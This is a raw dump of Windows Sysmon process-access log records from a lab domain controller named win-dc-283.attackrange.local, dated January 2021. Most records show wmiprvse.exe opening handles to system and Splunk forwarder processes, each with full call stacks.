16:09:48.739{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030731Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.739{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030730Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.739{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030729Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.739{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030728Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.739{7901BC46-55CC-6008-F506-00000000A301}60845740C:\Windows\system32\conhost.exe{7901BC46-55CC-6008-F406-00000000A301}4400C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030727Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.739{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030726Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030725Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030724Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030723Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030722Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030721Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030720Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030719Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030718Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030717Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030716Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-55CC-6008-F506-00000000A301}6084C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030715Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030714Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030713Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030712Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030711Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 